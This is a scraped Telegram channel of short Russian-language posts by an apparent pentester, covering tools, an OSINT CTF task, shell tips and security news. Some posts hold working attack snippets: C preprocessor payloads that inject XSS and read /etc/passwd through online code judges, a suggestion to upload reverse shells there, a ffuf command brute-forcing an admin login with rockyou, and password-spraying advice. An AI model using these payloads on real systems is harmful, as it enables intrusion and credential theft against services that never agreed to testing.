the sun
253 subscribers
32 photos
3 videos
3 files
24 links
Download Telegram
Channel created
Channel photo updated
https://github.com/ArturLukianov/tgecho

#tool #github #telegram #my #c

маленькая но в то же время удобная программа на С - отправляет сообщение в чат телеграмма через бота

удобно встраивать в пайплайны, особенно когда что-то висит в фоне или даже на сервере - достаточно просто добавить `&& tgecho "Task finished!"' и оставить задачу на сервере с nohup и в фоне
Channel name was changed to «the sun»
Небольшой разборчик таска от Tatar Osint Mindset

#osint #twitter #domain
Forwarded from tatar OSINT mindset (бедолага)
Второй таск для Tatar OSINT mindset

Новый ИБ стартап "Purple Watch" хвалится в своих социальных сетях, что их никто не сможет взломать и скоро они завоют весь рынок. Данный стартап заказал у вашей компании пентест, и в рамках OSINT этапа вам необходимо найти любую чувствительную информацию, которая может нанести ущерб компании.

Данный таск имеет 2 ответа: 1) Чувствительная информация 2) Флаг (вы сразу поймете при его нахождении)

Процесс решения вы можете обсуждать в данном чате.
https://github.com/ArturLukianov/totacres

#tool #github #my #python #offensive #graph

почему бы не применить подход Maltego к пентесту? IP адреса, порты, сервисы, веб странички, файлы можно представить в виде узлов графа, а сканирование через nmap, поиск директорий и использование metasploit для получения бэк-коннекта - как рёбра (они же transforms в maltego)

в этой тулзе я реализовал подобный подход, хотя всё ещё есть много проблем, несмотря на красоту идеи:
- если есть узел представляющий логин/почту (например вытащенную с сайта) и другой узел, пароль - как применить transform сразу к обоим, чтобы попытаться залогиниться в ssh/ftp/панельку?
- как обрабатывать человеко читаемые данные? Не сразу же GPT тащить с собой. Можно написать regex - но их надо будет слишком много и они могут пропускать. Или обучить модельку искать пароли в документе - но нужно размечать датасет
- есть вещи, которые требуют человеческого понимания - например то, насколько перспективно искать поддиректории в директориях. Пентестер поймёт, что искать поддиректории /css/ не так полезно как /api/ . Составлять модули и формализовать все такие знания кажется не очень полезным..

Но то что оно работает - это круто
Одна из машинок на tryhackme, решённая этим инструментом полностью
#offensive #compiler

Из систем для проверки кода (codeforces, итп) можно вытаскивать данные разными забавными способами

Таким макросом иногда можно получить ОС которую использует тестовая система:
cpp=
#ifdef _WIN32
#pragma message "Windows 32-bit"
#elif _WIN64
#pragma message "Windows 64-bit"
#elif APPLE || MACH
#pragma message "Mac OSX"
#elif linux
#pragma message "Linux"
#elif FreeBSD
#pragma message "FreeBSD"
#elif unix || unix__
#pragma message "Unix"
#else
#pragma message "Other"
#endif

int main() {}

Иногда с помощью макроса можно затриггерить XSS:
#pragma message "</pre><script>alert('xss')</script>"

int main() {}

А в некоторых случаях даже читать файлы инклудом:
#include "../../../../../../../../../etc/passwd"

int main() {}


И конечно никто не отменял возможность залить рев-шел (но лучше заливать сразу последовательность команд с выводом, так как таймлимит часто убивает программу до того как что-то успеешь сделать)
#offensive #burp #ffuf #web #bruteforce

Если использовать Burp Intruder для брутфорса (пиратку точно), то он может просто умирать при большом количестве запросов - вероятно кончается память для хранения ответов.

Один из вариантов - использовать ffuf для брутфорса.
Можно скопировать запрос из Developer Tools браузера в curl запрос -> заменить curl на ffuf -> добавить -u перед url и вордлист -> настроить фильтры на incorrect username -> наслаждаться многопоточным опенсорсным http брутфорсом который можно ставить на паузу

ffuf -w ./Wordlists/rockyou.txt -X POST -u https://somepage.com/login --data 'username=admin&password=FUZZ'
#offensive #web #python

Приложения на python, особенно использующие фласк часто подвержены race condition
#pipeline #linux
Иногда нужно вызвать какую-то команду для каждой строчки из файла. Например есть файл с кучей IP или доменов, а мы хотим запросить whois для каждого, можно воспользоваться xargs:

cat ips.txt | xargs -I '{}' sh -c 'whois {}'

Есть вариант покороче, но не всегда подходит:

cat ips.txt | xargs -n1 whois

- тут строчка из файла подставляется в конец, что не всегда подходит (ssh <строчка>@host или ffuf -u <хост>/?FUZZ=1 )
#offensive #note
Если получилось подобрать пароль к одному пользователю - стоит проверить такой же пароль для остальных пользователей (веерная брутфорс атака).

Иногда у пользователя больше одного аккаунта в системе - один может быть служебным, а другой - для работы с документами. Естественно, пароли для удобства ставят одинаковые
#codeanalysis
Удивительно, но парсеров для C (рабочих) почти нет.

Хорошо что у clang есть биндинги, и парсить ast можно даже через питон
Forwarded from vx-underground
Today VirusTotal announced that each sample uploaded will be accompanied by "Code Insight". Code Insight uses Sec-PaLM, one of the generative AI models by Google, to explain what the malicious binary is doing.

Code Insight is available to all users.

tl;dr "they took my job"
😢2
#chatgpt на удивление хорошо умеет создавать #frontend если дать правильный промпт
🔥21😁1
🛠 Встала, вроде бы, простая задачка - получить дамп трафика для конкретного приложения в Linux.

Для реализации нашлась утилита nsntrace, которое делает нужное за счёт выполнения приложения в отдельном сетевом неймспейсе. Набросал короткую заметку по этому поводу...

📗 https://sysadmin.pm/nsntrace/

#network #trace #pcap
👍1
Немного скринов к завтрашнему #attackdefense
👍6🥰1